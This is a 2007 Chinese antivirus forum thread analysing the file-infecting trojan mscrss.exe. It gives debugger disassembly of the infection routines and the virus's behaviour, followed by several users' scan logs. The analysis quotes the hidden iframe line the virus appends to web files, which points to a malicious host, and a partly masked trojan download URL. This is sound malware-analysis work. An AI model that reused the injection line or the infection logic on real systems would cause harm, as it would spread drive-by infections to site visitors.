mscrss.exe修改所有网页文件并感染exe,及下载的东西，6个报的不多

promised

oncare
2007-11-2 23:55 Windows Live OneCare found potentially harmful or unwanted software on your computer
Threat Name: Trojan:Win32/SystemHijack.gen
Detection Date and Time: 2007-11-2 23:55
File Name: C:\ABC\virus\mscrss.exe->(FSG-v2.0)
Threat Severity: Severe
Threat Category: Trojan
Contained Object: (FSG-v2.0)
Virus and spyware monitoring found potentially unwanted software: (ANTIVIRUS_ONACCESS_INFECTED)
Threat Status: Detected

压缩壳：fsg
文件大小：60,237
语言：Microsoft Visual C++ 6.0
病毒类型：感染类病毒
MD5: 784127A13ADD0D9DA20BE998CC384439
SHA1: AED95B8F719D01DBB9CCBF5312A741FFF69E065C
CRC32: 063258A2

1.首先ExitProcess
04055C2  |.  68 FF000000   PUSH 0FF                                 ; /ExitCode = FF
004055C7  \.  FF15 70B14000 CALL DWORD PTR DS:[<&kernel32.ExitProces>; \ExitProcess
2.调用ie写注册表注入explorer
00402A70  |.  50            PUSH EAX                                 ; /ProcessId
00402A71  |.  6A 00         PUSH 0                                   ; |Inheritable = FALSE
00402A73  |.  68 FF0F1F00   PUSH 1F0FFF                              ; |Access = PROCESS_ALL_ACCESS
00402A78  |.  FF15 7CB04000 CALL DWORD PTR DS:[<&KERNEL32.OpenProces>; \OpenProcess
00402A7E  |.  6A 00         PUSH 0                                   ; /ExitCode = 0
00402A80  |.  50            PUSH EAX                                 ; |hProcess
00402A81  |.  FF15 78B04000 CALL DWORD PTR DS:[<&KERNEL32.TerminateP>; \TerminateProcess
00402A87  |>  8D4424 28     LEA EAX,DWORD PTR SS:[ESP+28]
00402A8B  |.  50            PUSH EAX
00402A8C  |.  E8 DF060000   CALL 1.00403170
00402A91  |.  83C4 04       ADD ESP,4
00402A94  |.  68 F4010000   PUSH 1F4                                 ; /Timeout = 500. ms
00402A99  |.  FF15 60B04000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>]    ; \Sleep
00402A9F  |.  8D8C24 280100>LEA ECX,DWORD PTR SS:[ESP+128]
00402AA6  |.  68 04010000   PUSH 104                                 ; /BufSize = 104 (260.)
00402AAB  |.  51            PUSH ECX                                 ; |Buffer
00402AAC  |.  FF15 9CB04000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
00402AB2  |.  8D9424 280100>LEA EDX,DWORD PTR SS:[ESP+128]
00402AB9  |.  68 A8D14000   PUSH 1.0040D1A8                          ; /StringToAdd = "\Program Files\Internet Explorer\iexplore.exe"
00402ABE  |.  52            PUSH EDX                                 ; |ConcatString
00402ABF  |.  C68424 320100>MOV BYTE PTR SS:[ESP+132],0              ; |
00402AC7  |.  FF15 58B04000 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
00402ACD  |.  8D8424 280100>LEA EAX,DWORD PTR SS:[ESP+128]
00402AD4  |.  8D8C24 2C0200>LEA ECX,DWORD PTR SS:[ESP+22C]
00402ADB  |.  50            PUSH EAX                                 ; /String2
00402ADC  |.  51            PUSH ECX                                 ; |String1
00402ADD  |.  FF15 5CB04000 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00402AE3  |.  6A 00         PUSH 0                                   ; /IsShown = 0
00402AE5  |.  6A 00         PUSH 0                                   ; |DefDir = NULL
00402AE7  |.  8D9424 340200>LEA EDX,DWORD PTR SS:[ESP+234]           ; |
00402AEE  |.  6A 00         PUSH 0                                   ; |Parameters = NULL
00402AF0  |.  52            PUSH EDX                                 ; |FileName
00402AF1  |.  68 A0D14000   PUSH 1.0040D1A0                          ; |Operation = "open"
00402AF6  |.  6A 00         PUSH 0                                   ; |hWnd = NULL
00402AF8  |.  FF15 20B14000 CALL DWORD PTR DS:[<&SHELL32.ShellExecut>; \ShellExecuteA
00402AFE  |>  5F            POP EDI
00402AFF  |.  5E            POP ESI
00402B00  |.  81C4 24030000 ADD ESP,324
00402B06  \.  C3            RETN
00402B07      90            NOP
00402B08      90            NOP
00402B09      90            NOP
00402B0A      90            NOP
00402B0B      90            NOP
00402B0C      90            NOP
00402B0D      90            NOP
00402B0E      90            NOP
00402B0F      90            NOP
00402B10  /$  81EC 08010000 SUB ESP,108
00402B16  |.  53            PUSH EBX
00402B17  |.  56            PUSH ESI
00402B18  |.  57            PUSH EDI
00402B19  |.  B9 40000000   MOV ECX,40
00402B1E  |.  33C0          XOR EAX,EAX
00402B20  |.  8D7C24 11     LEA EDI,DWORD PTR SS:[ESP+11]
00402B24  |.  C64424 10 00  MOV BYTE PTR SS:[ESP+10],0
00402B29  |.  8D5424 10     LEA EDX,DWORD PTR SS:[ESP+10]
00402B2D  |.  F3:AB         REP STOS DWORD PTR ES:[EDI]
00402B2F  |.  66:AB         STOS WORD PTR ES:[EDI]
00402B31  |.  AA            STOS BYTE PTR ES:[EDI]
00402B32  |.  BF 10D24000   MOV EDI,1.0040D210                       ;  ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\"
00402B37  |.  83C9 FF       OR ECX,FFFFFFFF
00402B3A  |.  33C0          XOR EAX,EAX
00402B3C  |.  F2:AE         REPNE SCAS BYTE PTR ES:[EDI]
00402B3E  |.  F7D1          NOT ECX
00402B40  |.  2BF9          SUB EDI,ECX
00402B42  |.  8BC1          MOV EAX,ECX
00402B44  |.  8BF7          MOV ESI,EDI
00402B46  |.  8BFA          MOV EDI,EDX
00402B48  |.  8D5424 10     LEA EDX,DWORD PTR SS:[ESP+10]
00402B4C  |.  C1E9 02       SHR ECX,2
00402B4F  |.  F3:A5         REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00402B51  |.  8BC8          MOV ECX,EAX
00402B53  |.  33C0          XOR EAX,EAX
00402B55  |.  83E1 03       AND ECX,3
00402B58  |.  F3:A4         REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00402B5A  |.  BF E8D14000   MOV EDI,1.0040D1E8                       ;  ASCII "{CE7C3CF0-4B15-11D1-ABED-709549C10000}"
00402B5F  |.  83C9 FF       OR ECX,FFFFFFFF
00402B62  |.  F2:AE         REPNE SCAS BYTE PTR ES:[EDI]
00402B64  |.  F7D1          NOT ECX
00402B66  |.  2BF9          SUB EDI,ECX
00402B68  |.  8BF7          MOV ESI,EDI
00402B6A  |.  8BD9          MOV EBX,ECX
00402B6C  |.  8BFA          MOV EDI,EDX
00402B6E  |.  83C9 FF       OR ECX,FFFFFFFF
00402B71  |.  F2:AE         REPNE SCAS BYTE PTR ES:[EDI]
00402B73  |.  8BCB          MOV ECX,EBX
00402B75  |.  4F            DEC EDI
00402B76  |.  C1E9 02       SHR ECX,2
00402B79  |.  F3:A5         REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00402B7B  |.  8BCB          MOV ECX,EBX
00402B7D  |.  8D4424 0C     LEA EAX,DWORD PTR SS:[ESP+C]
00402B81  |.  83E1 03       AND ECX,3
00402B84  |.  50            PUSH EAX                                 ; /pHandle
00402B85  |.  F3:A4         REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
00402B87  |.  68 3F000F00   PUSH 0F003F                              ; |Access = KEY_ALL_ACCESS
00402B8C  |.  8D4C24 18     LEA ECX,DWORD PTR SS:[ESP+18]            ; |
00402B90  |.  6A 00         PUSH 0                                   ; |Reserved = 0
00402B92  |.  51            PUSH ECX                                 ; |Subkey
00402B93  |.  68 02000080   PUSH 80000002                            ; |hKey = HKEY_LOCAL_MACHINE
00402B98  |.  FF15 0CB04000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
3.添加服务
00402D62   MOV EDI,1.0040D25C                        ASCII "SYSTEM\CurrentControlSet\Services\"（HKEY_LOCAL_MACHINE）
00402E98   PUSH 1.0040D194                           ASCII "PEINFECT"
4.顺序查找第一个文件夹创建病毒文件副本（系统加上隐藏属性）并在盘符值下创建对应的autorun.inf，在C：\WINDOWS\system32下创建病毒文件副本以及所用mscrss.dll
5.顺序查找一下后缀网页文件，在尾部添加<iframe src="http://pk.yhgames.com/index.htm" width="0" height="0"></iframe>
  顺序查找exe并感染，应该是忽略了windows，winnt，Program Files和本身（两次感染相隔sleep的时间比较长 ）
00401550  /$  81EC 50040000 SUB ESP,450
00401556  |.  53            PUSH EBX
00401557  |.  55            PUSH EBP
00401558  |.  8BAC24 5C0400>MOV EBP,DWORD PTR SS:[ESP+45C]
0040155F  |.  56            PUSH ESI
00401560  |.  68 10D14000   PUSH 1.0040D110                          ;  ASCII "windows"
00401565  |.  8BD9          MOV EBX,ECX
00401567  |.  55            PUSH EBP
00401568  |.  E8 AF920000   CALL 1.0040A81C
0040156D  |.  83C4 04       ADD ESP,4
00401570  |.  50            PUSH EAX
00401571  |.  E8 FA360000   CALL 1.00404C70
00401576  |.  83C4 08       ADD ESP,8
00401579  |.  85C0          TEST EAX,EAX
0040157B  |.  0F85 B6020000 JNZ 1.00401837
00401581  |.  68 08D14000   PUSH 1.0040D108                          ;  ASCII "winnt"
00401586  |.  55            PUSH EBP
00401587  |.  E8 90920000   CALL 1.0040A81C
0040158C  |.  83C4 04       ADD ESP,4
0040158F  |.  50            PUSH EAX
00401590  |.  E8 DB360000   CALL 1.00404C70
00401595  |.  83C4 08       ADD ESP,8
00401598  |.  85C0          TEST EAX,EAX
0040159A  |.  0F85 97020000 JNZ 1.00401837
004015A0  |.  68 F8D04000   PUSH 1.0040D0F8                          ;  ASCII "Program Files"
004015A5  |.  55            PUSH EBP
004015A6  |.  E8 71920000   CALL 1.0040A81C
004015AB  |.  83C4 04       ADD ESP,4
004015AE  |.  50            PUSH EAX
004015AF  |.  E8 BC360000   CALL 1.00404C70
004015B4  |.  83C4 08       ADD ESP,8
004015B7  |.  85C0          TEST EAX,EAX
004015B9  |.  0F85 78020000 JNZ 1.00401837
004015BF  |.  6A 64         PUSH 64                                  ; /Timeout = 100. ms
004015C1  |.  FF15 60B04000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>]    ; \Sleep
004015C7  |.  8D8424 540200>LEA EAX,DWORD PTR SS:[ESP+254]
004015CE  |.  55            PUSH EBP                                 ; /String2
004015CF  |.  50            PUSH EAX                                 ; |String1
004015D0  |.  FF15 5CB04000 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
004015D6  |.  8D8C24 540200>LEA ECX,DWORD PTR SS:[ESP+254]
004015DD  |.  51            PUSH ECX
004015DE  |.  8BCB          MOV ECX,EBX
004015E0  |.  E8 2BFFFFFF   CALL 1.00401510
004015E5  |.  8B35 58B04000 MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>;  kernel32.lstrcatA
004015EB  |.  85C0          TEST EAX,EAX
004015ED  |.  75 0F         JNZ SHORT 1.004015FE
004015EF  |.  8D9424 540200>LEA EDX,DWORD PTR SS:[ESP+254]
004015F6  |.  68 F4D04000   PUSH 1.0040D0F4                          ; /StringToAdd = "\"
004015FB  |.  52            PUSH EDX                                 ; |ConcatString
004015FC  |.  FFD6          CALL ESI                                 ; \lstrcatA
004015FE  |>  8D8424 540200>LEA EAX,DWORD PTR SS:[ESP+254]
00401605  |.  68 F0D04000   PUSH 1.0040D0F0                          ;  ASCII "*.*"
0040160A  |.  50            PUSH EAX
0040160B  |.  FFD6          CALL ESI
0040160D  |.  8D4C24 10     LEA ECX,DWORD PTR SS:[ESP+10]
00401611  |.  8D9424 540200>LEA EDX,DWORD PTR SS:[ESP+254]
00401618  |.  51            PUSH ECX                                 ; /pFindFileData
00401619  |.  52            PUSH EDX                                 ; |FileName
0040161A  |.  FF15 54B04000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00401620  |.  83F8 FF       CMP EAX,-1
00401623  |.  894424 0C     MOV DWORD PTR SS:[ESP+C],EAX
00401627  |.  0F84 0A020000 JE 1.00401837
0040162D  |.  57            PUSH EDI
0040162E  |>  6A 64         /PUSH 64                                 ; /Timeout = 100. ms
00401630  |.  FF15 60B04000 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>]   ; \Sleep
00401636  |.  807C24 40 2E  |CMP BYTE PTR SS:[ESP+40],2E
0040163B  |.  0F84 D6010000 |JE 1.00401817
00401641  |.  8A4424 14     |MOV AL,BYTE PTR SS:[ESP+14]
00401645  |.  55            |PUSH EBP
00401646  |.  A8 10         |TEST AL,10
00401648  |.  8BCB          |MOV ECX,EBX
0040164A  |.  74 56         |JE SHORT 1.004016A2
0040164C  |.  E8 BFFEFFFF   |CALL 1.00401510
00401651  |.  85C0          |TEST EAX,EAX
00401653  |.  74 15         |JE SHORT 1.0040166A
00401655  |.  8D4424 40     |LEA EAX,DWORD PTR SS:[ESP+40]
00401659  |.  8D8C24 5C0300>|LEA ECX,DWORD PTR SS:[ESP+35C]
00401660  |.  50            |PUSH EAX
00401661  |.  55            |PUSH EBP
00401662  |.  68 E8D04000   |PUSH 1.0040D0E8                         ;  ASCII "%s%s"
00401667  |.  51            |PUSH ECX
00401668  |.  EB 13         |JMP SHORT 1.0040167D
0040166A  |>  8D5424 40     |LEA EDX,DWORD PTR SS:[ESP+40]
0040166E  |.  8D8424 5C0300>|LEA EAX,DWORD PTR SS:[ESP+35C]
00401675  |.  52            |PUSH EDX                                ; /<%s>
00401676  |.  55            |PUSH EBP                                ; |<%s>
00401677  |.  68 E0D04000   |PUSH 1.0040D0E0                         ; |Format = "%s\%s"
0040167C  |.  50            |PUSH EAX                                ; |s
0040167D  |>  FF15 38B14000 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
00401683  |.  8B8C24 780400>|MOV ECX,DWORD PTR SS:[ESP+478]
0040168A  |.  83C4 10       |ADD ESP,10
0040168D  |.  8D9424 5C0300>|LEA EDX,DWORD PTR SS:[ESP+35C]
00401694  |.  51            |PUSH ECX                                ; /Arg2
00401695  |.  52            |PUSH EDX                                ; |Arg1
00401696  |.  8BCB          |MOV ECX,EBX                             ; |
00401698  |.  E8 B3FEFFFF   |CALL 1.00401550                         ; \1.00401550
0040169D  |.  E9 75010000   |JMP 1.00401817
004016A2  |>  E8 69FEFFFF   |CALL 1.00401510
004016A7  |.  85C0          |TEST EAX,EAX
004016A9  |.  74 15         |JE SHORT 1.004016C0
004016AB  |.  8D4424 40     |LEA EAX,DWORD PTR SS:[ESP+40]
004016AF  |.  8D8C24 540100>|LEA ECX,DWORD PTR SS:[ESP+154]
004016B6  |.  50            |PUSH EAX
004016B7  |.  55            |PUSH EBP
004016B8  |.  68 E8D04000   |PUSH 1.0040D0E8                         ;  ASCII "%s%s"
004016BD  |.  51            |PUSH ECX
004016BE  |.  EB 13         |JMP SHORT 1.004016D3
004016C0  |>  8D5424 40     |LEA EDX,DWORD PTR SS:[ESP+40]
004016C4  |.  8D8424 540100>|LEA EAX,DWORD PTR SS:[ESP+154]
004016CB  |.  52            |PUSH EDX                                ; /<%s>
004016CC  |.  55            |PUSH EBP                                ; |<%s>
004016CD  |.  68 E0D04000   |PUSH 1.0040D0E0                         ; |Format = "%s\%s"
004016D2  |.  50            |PUSH EAX                                ; |s
004016D3  |>  FF15 38B14000 |CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
004016D9  |.  83C4 10       |ADD ESP,10
004016DC  |.  8D4C24 40     |LEA ECX,DWORD PTR SS:[ESP+40]
004016E0  |.  6A 2E         |PUSH 2E
004016E2  |.  51            |PUSH ECX
004016E3  |.  E8 58350000   |CALL 1.00404C40
004016E8  |.  8BF8          |MOV EDI,EAX
004016EA  |.  83C4 08       |ADD ESP,8
004016ED  |.  85FF          |TEST EDI,EDI
004016EF  |.  0F84 22010000 |JE 1.00401817
004016F5  |.  68 D8D04000   |PUSH 1.0040D0D8                         ;  ASCII ".exe"
004016FA  |.  57            |PUSH EDI
004016FB  |.  E8 90900000   |CALL 1.0040A790
00401700  |.  83C4 08       |ADD ESP,8
00401703  |.  85C0          |TEST EAX,EAX
00401705  |.  0F85 89000000 |JNZ 1.00401794
0040170B  |.  8D9424 540100>|LEA EDX,DWORD PTR SS:[ESP+154]
00401712  |.  8BCB          |MOV ECX,EBX
00401714  |.  52            |PUSH EDX
00401715  |.  E8 46FAFFFF   |CALL 1.00401160
0040171A  |.  85C0          |TEST EAX,EAX
0040171C  |.  74 76         |JE SHORT 1.00401794
0040171E  |.  68 F4010000   |PUSH 1F4                                ; /Timeout = 500. ms
00401723  |.  FF15 60B04000 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>]   ; \Sleep
00401729  |.  8D8424 540100>|LEA EAX,DWORD PTR SS:[ESP+154]
00401730  |.  50            |PUSH EAX                                ; /FileName
00401731  |.  FF15 50B04000 |CALL DWORD PTR DS:[<&KERNEL32.LoadLibra>; \LoadLibraryA
00401737  |.  8BF0          |MOV ESI,EAX
00401739  |.  85F6          |TEST ESI,ESI
0040173B  |.  74 57         |JE SHORT 1.00401794
0040173D  |.  6A 0A         |PUSH 0A                                 ; /ResourceType = RT_RCDATA
0040173F  |.  68 D0D04000   |PUSH 1.0040D0D0                         ; |ResourceName = "PERES"
00401744  |.  56            |PUSH ESI                                ; |hModule
00401745  |.  FF15 4CB04000 |CALL DWORD PTR DS:[<&KERNEL32.FindResou>; \FindResourceA
0040174B  |.  85C0          |TEST EAX,EAX
0040174D  |.  75 3E         |JNZ SHORT 1.0040178D
0040174F  |.  56            |PUSH ESI                                ; /hLibModule
00401750  |.  FF15 48B04000 |CALL DWORD PTR DS:[<&KERNEL32.FreeLibra>; \FreeLibrary
00401756  |.  68 8CE54000   |PUSH 1.0040E58C
0040175B  |.  68 D0D04000   |PUSH 1.0040D0D0                         ;  ASCII "PERES"
00401760  |.  8D8C24 5C0100>|LEA ECX,DWORD PTR SS:[ESP+15C]
00401767  |.  6A 0A         |PUSH 0A
00401769  |.  51            |PUSH ECX
0040176A  |.  8BCB          |MOV ECX,EBX
0040176C  |.  E8 FFF8FFFF   |CALL 1.00401070
00401771  |.  85C0          |TEST EAX,EAX
00401773  |.  74 18         |JE SHORT 1.0040178D
00401775  |.  68 F4010000   |PUSH 1F4                                ; /Timeout = 500. ms
0040177A  |.  FF15 60B04000 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>]   ; \Sleep
00401780  |.  8D9424 540100>|LEA EDX,DWORD PTR SS:[ESP+154]
00401787  |.  52            |PUSH EDX                                ; /Arg1
00401788  |.  E8 682E0000   |CALL 1.004045F5                         ; \1.004045F5
0040178D  |>  56            |PUSH ESI                                ; /hLibModule
0040178E  |.  FF15 48B04000 |CALL DWORD PTR DS:[<&KERNEL32.FreeLibra>; \FreeLibrary
00401794  |>  68 C8D04000   |PUSH 1.0040D0C8                         ;  ASCII ".htm"
00401799  |.  57            |PUSH EDI
0040179A  |.  E8 F18F0000   |CALL 1.0040A790
0040179F  |.  83C4 08       |ADD ESP,8
004017A2  |.  85C0          |TEST EAX,EAX
004017A4  |.  74 5A         |JE SHORT 1.00401800
004017A6  |.  68 C0D04000   |PUSH 1.0040D0C0                         ;  ASCII ".html"
004017AB  |.  57            |PUSH EDI
004017AC  |.  E8 DF8F0000   |CALL 1.0040A790
004017B1  |.  83C4 08       |ADD ESP,8
004017B4  |.  85C0          |TEST EAX,EAX
004017B6  |.  74 48         |JE SHORT 1.00401800
004017B8  |.  68 B8D04000   |PUSH 1.0040D0B8                         ;  ASCII ".asp"
004017BD  |.  57            |PUSH EDI
004017BE  |.  E8 CD8F0000   |CALL 1.0040A790
004017C3  |.  83C4 08       |ADD ESP,8
004017C6  |.  85C0          |TEST EAX,EAX
004017C8  |.  74 36         |JE SHORT 1.00401800
004017CA  |.  68 B0D04000   |PUSH 1.0040D0B0                         ;  ASCII ".jsp"
004017CF  |.  57            |PUSH EDI
004017D0  |.  E8 BB8F0000   |CALL 1.0040A790
004017D5  |.  83C4 08       |ADD ESP,8
004017D8  |.  85C0          |TEST EAX,EAX
004017DA  |.  74 24         |JE SHORT 1.00401800
004017DC  |.  68 A8D04000   |PUSH 1.0040D0A8                         ;  ASCII ".php"
004017E1  |.  57            |PUSH EDI
004017E2  |.  E8 A98F0000   |CALL 1.0040A790
004017E7  |.  83C4 08       |ADD ESP,8
004017EA  |.  85C0          |TEST EAX,EAX
004017EC  |.  74 12         |JE SHORT 1.00401800
004017EE  |.  68 A0D04000   |PUSH 1.0040D0A0                         ;  ASCII ".cgi"
004017F3  |.  57            |PUSH EDI
004017F4  |.  E8 978F0000   |CALL 1.0040A790
004017F9  |.  83C4 08       |ADD ESP,8
004017FC  |.  85C0          |TEST EAX,EAX
004017FE  |.  75 17         |JNZ SHORT 1.00401817
00401800  |>  8B8424 680400>|MOV EAX,DWORD PTR SS:[ESP+468]
00401807  |.  8D8C24 540100>|LEA ECX,DWORD PTR SS:[ESP+154]
0040180E  |.  50            |PUSH EAX                                ; /Arg2
0040180F  |.  51            |PUSH ECX                                ; |Arg1
00401810  |.  8BCB          |MOV ECX,EBX                             ; |
00401812  |.  E8 39FAFFFF   |CALL 1.00401250                         ; \1.00401250
00401817  |>  8B7424 10     |MOV ESI,DWORD PTR SS:[ESP+10]
0040181B  |.  8D5424 14     |LEA EDX,DWORD PTR SS:[ESP+14]
0040181F  |.  52            |PUSH EDX                                ; /pFindFileData
00401820  |.  56            |PUSH ESI                                ; |hFile
00401821  |.  FF15 44B04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextF>; \FindNextFileA
00401827  |.  85C0          |TEST EAX,EAX
00401829  |.^ 0F85 FFFDFFFF \JNZ 1.0040162E
0040182F  |.  56            PUSH ESI                                 ; /hSearch
00401830  |.  FF15 40B04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>>; \FindClose
6.下载木马http://ieopen.yhgames.com/******/****/upbho.exe并运行

[ 本帖最后由 promised 于 2007-11-4 01:21 编辑 ]

458506

发现病毒: Trojan.Win32.BHO.qn, Trojan.Win32.BHO.qo

下载网页内容时, 发现病毒.

地址: bbs.kafan.cn

平淡

jimmyleo

Found [    VBS_SOLOW.DN](    1) in D:\download\virusscan\`.exe
Undet [                ](     ) in D:\download\virusscan\LoadName1.exe
Undet [                ](     ) in D:\download\virusscan\mscrss.dll
Undet [                ](     ) in D:\download\virusscan\mscrss.exe
Undet [                ](     ) in D:\download\virusscan\MSSCKETS.DLL
Undet [                ](     ) in D:\download\virusscan\RCX8C6.exe
6 files have been read.
6 files have been checked.
6 files have been scanned.
6 files have been scanned. (including files in archived)
1 files containing viruses.
Found 1 viruses totally.
Maybe 0 viruses totally.
Stop At : 11/3/2007 22:44:24        1 second (0.96 seconds) has elapsed.

wangjay1980

detected: Trojan program Trojan.Win32.BHO.qn        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\virus.rar/LoadName1.exe//FSG
detected: Trojan program Trojan.Win32.BHO.qo        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\virus.rar/MSSCKETS.DLL

jimmyleo

>>D:\Download\VirusScan\LoadName1.exe probably infected with DLOADER.Trojan
D:\Download\VirusScan\mscrss.dll probably infected with DLOADER.Trojan
>>D:\Download\VirusScan\mscrss.exe probably infected with DLOADER.Trojan
D:\Download\VirusScan\MSSCKETS.DLL probably infected with DLOADER.Trojan
D:\Download\VirusScan\RCX8C6.exe probably infected with DLOADER.Trojan


Suspicious objects found: 5

蜘蛛难得彪了

jimmyleo

Begin scan in 'D:\Download\VirusScan'
D:\Download\VirusScan\`.exe
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      The file was moved to '47918a1d.qua'!
D:\Download\VirusScan\LoadName1.exe
      [DETECTION] Is the Trojan horse TR/Drop.Agent.hyt
      [INFO]      A backup was created as '478d8a5e.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
D:\Download\VirusScan\mscrss.dll
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '478f8a62.qua'!
D:\Download\VirusScan\mscrss.exe
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '462f042b.qua'!
D:\Download\VirusScan\MSSCKETS.DLL
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '477f8a42.qua'!
D:\Download\VirusScan\RCX8C6.exe
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was moved to '47848a32.qua'!

我想怎么trend把那个报称VBS呐……

woai_jolin

Scan Log
Version of virus signature database: 2636 (20071103)
Date: 2007-11-3  Time: 22:55:56
Scanned disks, folders and files: G:\V\virus.rar
G:\V\virus.rar &raquo; RAR &raquo; LoadName1.exe &raquo; FSG v2.0 - is OK
G:\V\virus.rar &raquo; RAR &raquo; mscrss.dll - is OK
G:\V\virus.rar &raquo; RAR &raquo; mscrss.exe - probably unknown NewHeur_PE virus [7] - was a part of the deleted object
G:\V\virus.rar &raquo; RAR &raquo; MSSCKETS.DLL - is OK
G:\V\virus.rar &raquo; RAR &raquo; RCX8C6.exe - is OK
G:\V\virus.rar &raquo; RAR &raquo; `.exe - is OK
Number of scanned objects: 7
Number of threats found: 1
Time of completion: 22:56:03  Total scanning time: 7 sec (00:00:07)
Notes:
[7] Object is probably infected with an unknown virus.

billmxc

Begin scan in 'C:\Documents and Settings\Owner\桌面\virus.rar'
C:\Documents and Settings\Owner\桌面\virus.rar
  [0] Archive type: RAR
  --> LoadName1.exe
      [DETECTION] Is the Trojan horse TR/Drop.Agent.hyt
  --> mscrss.dll
      [DETECTION] Contains suspicious code HEUR/Malware
  --> mscrss.exe
      [DETECTION] Contains suspicious code HEUR/Malware
  --> MSSCKETS.DLL
      [DETECTION] Contains suspicious code HEUR/Malware
  --> RCX8C6.exe
      [DETECTION] Contains suspicious code HEUR/Malware
  --> `.exe
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [INFO]      A backup was created as '479e8ca5.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!


End of the scan: 星期六 2007年11月3日  22:57
Used time: 00:18 min

The scan has been done completely.

      0 Scanning directories
      7 Files were scanned
      1 viruses and/or unwanted programs were found
      5 Files were classified as suspicious:
      1 files were deleted
      0 files were repaired
      1 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      6 Files not concerned
      1 Archives were scanned
      0 Warnings
      0 Notes

zwl2828

ESET Smart Security
C:\Users\Administrator\Desktop\virus.rar &raquo; RAR &raquo; mscrss.exe - probably unknown NewHeur_PE virus